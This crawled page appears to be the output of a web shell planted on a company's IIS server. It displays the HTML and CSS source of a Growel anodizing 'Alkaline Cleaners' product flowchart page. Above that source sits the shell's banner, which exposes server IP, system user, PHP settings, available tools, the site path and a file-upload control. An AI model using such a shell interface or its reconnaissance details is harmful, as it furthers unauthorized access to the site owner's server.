. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
| Server IP : 87.98.249.37 / Your IP : 216.73.216.208 [ Web Server : Microsoft-IIS/10.0 System : Windows NT NS3076740 10.0 build 17763 (Windows Server 2019) AMD64 User : IWPD_292(growel19p) ( 0) PHP Version : 8.3.12 Disable Function : NONE Domains : 0 Domains MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/Inetpub/vhosts/growel.com/httpdocs/demo/anodizing/ |
Upload File : |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Anodizing Process Sequence</title>
<style>
body {
font-family: Arial, sans-serif;
background: #fff;
margin: 0;
padding: 20px;
color: #333;
}
h1 {
text-align: center;
color: #D0342A;
margin-bottom: 40px;
}
/* Flowchart container */
.alkaline-flowchart {
display: flex;
justify-content: center;
gap: 80px;
flex-wrap: wrap;
position: relative;
}
.alkaline-stage {
display: flex;
flex-direction: column;
align-items: center;
min-width: 220px;
position: relative;
}
/* Diamond shape */
.alkaline-diamond {
width: 100%;
height: 150px;
background: #D0342A;
color: #fff;
text-align: center;
line-height: 140px;
margin-bottom: 20px;
font-weight: bold;
font-size: 16px;
position: relative;
overflow: hidden;
border-bottom-left-radius: 30px;
border-top-right-radius: 50px;
}
.alkaline-diamond img {
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
object-fit: cover;
}
.alkaline-diamond span {
position: relative;
display: block;
line-height: normal;
top: 50%;
left: 50%;
transform: translate(-50%, -50%);
font-size: 14px;
font-weight: bold;
background: rgba(0, 0, 0, 0.4);
padding: 4px 8px;
border-radius: 4px;
}
/* Box link */
.alkaline-box {
background: #f9f9f9;
border: 2px solid #D0342A;
border-radius: 6px;
padding: 10px 20px;
margin: 2px 0;
text-align: center;
/* min-width: 160px; */
font-size: 15px;
transition: background 0.3s;
cursor: pointer;
text-decoration: none;
color: #333;
position: relative;
}
.alkaline-box:hover {
background: #ffeaea;
}
/* Connector line (optional, horizontal) */
.alkaline-flowchart::before {
content: "";
position: absolute;
top: 70px;
left: 5%;
right: 5%;
height: 2px;
z-index: -1;
}
.alkaline-stage .alkaline-diamond img {
transition: transform 0.4s ease, filter 0.4s ease;
}
.alkaline-stage:hover .alkaline-diamond img {
transform: scale(1.1) rotate(3deg);
filter: brightness(1.15) contrast(1.1);
}
/* Responsive stacking */
@media (max-width: 768px) {
.alkaline-flowchart {
flex-direction: column;
align-items: center;
gap: 40px;
}
.alkaline-flowchart::before {
display: none;
}
}
</style>
</head>
<body>
<div class="header">
<a href="index.html"><img src="header.png" alt="Growel Logo" style="min-width:100vw;"></a>
</div>
<br><br>
<h1>Alkaline Cleaners</h1>
<br>
<div class="alkaline-flowchart">
<!-- Stage 1 -->
<div class="alkaline-stage">
<div class="alkaline-diamond">
<img src="https://growel.com/images/products/Surface-Conditioning.jpg" alt="Cleaning">
</div>
<a href="alkaline-cleaners.html" class="alkaline-box">I-FIN AL SC 53</a>
</div>
<!-- Stage 2 -->
<div class="alkaline-stage">
<div class="alkaline-diamond">
<img src="https://www.azz.com/wp-content/uploads/2021/05/anodizing-min.jpg" alt="Cleaning">
</div>
<a href="alkaline-cleaners.html" class="alkaline-box">I-FIN AL 824</a>
</div>
<!-- Stage 3 -->
<div class="alkaline-stage">
<div class="alkaline-diamond">
<img src="https://www.azz.com/wp-content/uploads/2021/05/anodizing-min.jpg" alt="Cleaning">
</div>
<a href="alkaline-cleaners.html" class="alkaline-box">GROWSPACE 814 SPL</a>
</div>
</div>
</body>
</html>